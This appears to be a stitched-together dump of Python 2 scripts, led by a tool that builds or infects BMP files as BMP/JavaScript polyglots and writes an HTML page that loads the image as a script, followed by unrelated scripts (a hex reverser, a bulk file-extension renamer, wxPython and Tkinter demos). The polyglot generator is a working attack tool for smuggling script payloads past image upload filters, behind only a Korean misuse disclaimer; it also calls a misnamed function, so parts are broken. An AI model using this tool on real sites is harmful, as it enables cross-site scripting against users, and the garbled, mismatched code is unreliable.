BA

###이 코드를 악용할시 책임은 전적으로 악용한 사람에게 있음 ###

#!/usr/bin/python
# -*- coding:utf-8 -*-

import argparse
import os

#===--------------
def _hexify(num):
  """
    Converts and formats to hexadecimal
  """
  num="%x" % num
  if len(num) %2:
    num='0'+num
  return num.decode('hex')

#---------------------------
#Example payload: "var _0xe428=[\""+b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64'+"\"]
#;alert(_0xe428[0]);"
def _generate_and_write_tofile(payload, fname):
  """
    Generates a fake but valid BMP within scripting
  """
  f=open(fname,"wb")
  header=(b'\x42\x4D'   #Signature BM
          b'\x2F\x2A\x00\x00'   #Header File size, but encoded as /* Yes,it's a valid header
          b'\x00\x00\x00\x00'   #Reserved
          b'\x00\x00\x00\x00'   #bitmap data offset
          b''+_hexify(len(payload))+    #bitmap header size
          b'\x00\x00\x00\x14'   #width 20pixel
          b'\x00\x00\x00\x14'   #height 20pixel
          b'\x00\x00'   #nb_plan
          b'\x00\x00'   #nb per pixel
          b'\x00\x10\x00\x00'   #compression type
          b'\x00\x00\x00\x00'   #image size
          b'\x00\x00\x00\x01'   #Horizontal resolution
          b'\x00\x00\x00\x01'   #Vertial resolution
          b'\x00\x00\x00\x00'   #number of colors
          b'\x00\x00\x00\x00'   #number important colors
          b'\x00\x00\x00\x80'   #palet colors to be complient
          b'\x00\x80\xff\x80'   #palet colors to be complient
          b'\x80\x00\xff\x2A'   #palet colors to be complient
          b'\x2F\x3D\x31\x3B'   #*/=1;
      )
  f.write(header)
  f.write(payload)
  f.close()
  return True

#----------------------------------------
def _generate_launching_page(f):

  """
  Creates the HTML launching page
  """
  htmlpage="""
              <html>
              <head><title>Opening an image</title></head>
              <body>
                    <img src=\""""+f+"""\"\>
                    <script src=\""""+f+"""\"></script>
              </body>
              </html>
          """
  html=open("run.html","wb")
  html.write(htmlpage);
  html.close()
  return True

#-------------------------------------
def _inject_into_file(payload, fname):
  """
    Inject the payload into existing BMP
    NOTE: if the BMP contains \xFF\x2A might cause issues
  """
  f=open(fname, "r+b")
  b=f.read()
  b.replace(b'\x24\x2F',b'\x00\x00')
  f.close()

  f=open(fname,"w+b")
  f.write(b)
  f.seek(2,0)
  f.write(b'\x2F\x2A')
  f.close()

  f=open(fname,"a+b")
  f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
  f.write(payload)
  f.close()
  return True

#-------------------------------------------
if __name__=="__main__":
  parser=argparse.ArgumentParser()
  parser.add_argument("filename",help="the bmp file name to be generated/or infected")
  parser.add_argument("js_payload",help="the payload to be injected. For example:\"alert(\"test\");\"")
  parser.add_argument("-i","--inject-to-existing-bmp",action="store_true",help="inject into the currentbitmap")
  args=parser.parse_args()
  print("""
        |=========================================|
        |[!] It is the end user's responsibility  |
        |=========================================|
      """)
  if args.inject_to_existing_bmp:
    _inject_into_file(args.js_payload, args.filename)
  else:
    _generate_and_write_to_file(args.js_payload, args.filename)

  _generate_launching_page(args.filename)
  print "[+] Finished!"

#!/usr/bin/python
# -*- coding:utf-8 -*-

import sys, binascii

f=open(sys.argv[1],'rb')
data=f.read()
f.close()

tmp=binascii.hexlify(data)
print type(tmp)
output=open(sys.argv[1]+ '-output','wb')
output.write(binascii.unhexlify(tmp[::-1]))

output.close()

#!/usr/bin/python
# -*- coding:utf-8 -*-

import os,sys,optparse

def main():
  parser=optparse.OptionParser('usage chageExt.py -s <source ext> -d <dest ext>')
  parser.add_option('-s', dest='srcext', type='string', help='source ext')
  parser.add_option('-d', dest='destext', type='string', help='dest ext')

  (options, args)=parser.parse_args()

  srcext =options.srcext
  destext=options.destext

  if (srcext== None) | (destext==None):
    print parser.usage
    exit(0)

  for base, dirs, names in os.walk("./"):
    for name in names:
      if os.path.splitext(name)[1].lower()=="."+srcext :
        src=os.path.join(base, name)
        dest=os.path.splitext(src)[0]+"."+destext
        #print src
        #print dest
        os.rename(src, dest)

if __name__== '__main__':
  main()

#!/usr/bin/python
# -*- coding: utf-8 -*-

import wx

class TestFrame(wx.Frame):
  def __init__(self,parent,id,title):
    wx.Frame.__init__(self,parent, id,title,wx.DefaultPosition, wx.Size(300,400))
    # create panel
    panel=wx.Panel(self,-1,(0,0),(300,400),style=wx.SUNKEN_BORDER)
    self.picture=wx.StaticBitmap(panel)
    panel.SetBackgroundColour(wx.WHITE)
    self.picture.SetFocus()
    self.picture.SetBitmap(wx.Bitmap('/img/frame1.gif'))
 
class TestApp(wx.App):
  def OnInit(self):
    frame=TestFrame(None, -1, "My Image")
    frame.CenterOnScreen()

    StatusBar=frame.CreateStatusBar()
    StatusBar.SetStatusText('StatusBar')

    MenuBar=wx.MenuBar()
    menu=wx.Menu()
    menu.Append(wx.ID_EXIT, 'E&xit\tAlt-X', '종료')
    MenuBar.Append(menu, '&파일')

    menu1=wx.Menu()
    menu1.Append(200, 'Test','테스트메뉴')
    menu1.Append(201, 'Copy','복사')
    menu1.Append(202, 'Paste','붙여넣기')
    MenuBar.Append(menu1, '&편집')
    frame.SetMenuBar(MenuBar)

    frame.Show(True)
    return True

app=TestApp(0)
app.MainLoop()

#!/usr/bin/python

import Tkinter
from Tkconstants import *
tk=Tkinter.Tk()
frame = Tkinter.Frame(tk, relief=RIDGE, borderwidth=2)
frame.pack(fill=BOTH, expand=1)
label=Tkinter.Label(frame, text="Hello, World")
label.pack(fill=X, expand=1)
button=Tkinter.Button(frame, text="Exit",command=tk.destroy)
button.pack(side=BOTTOM)
tk.mainloop()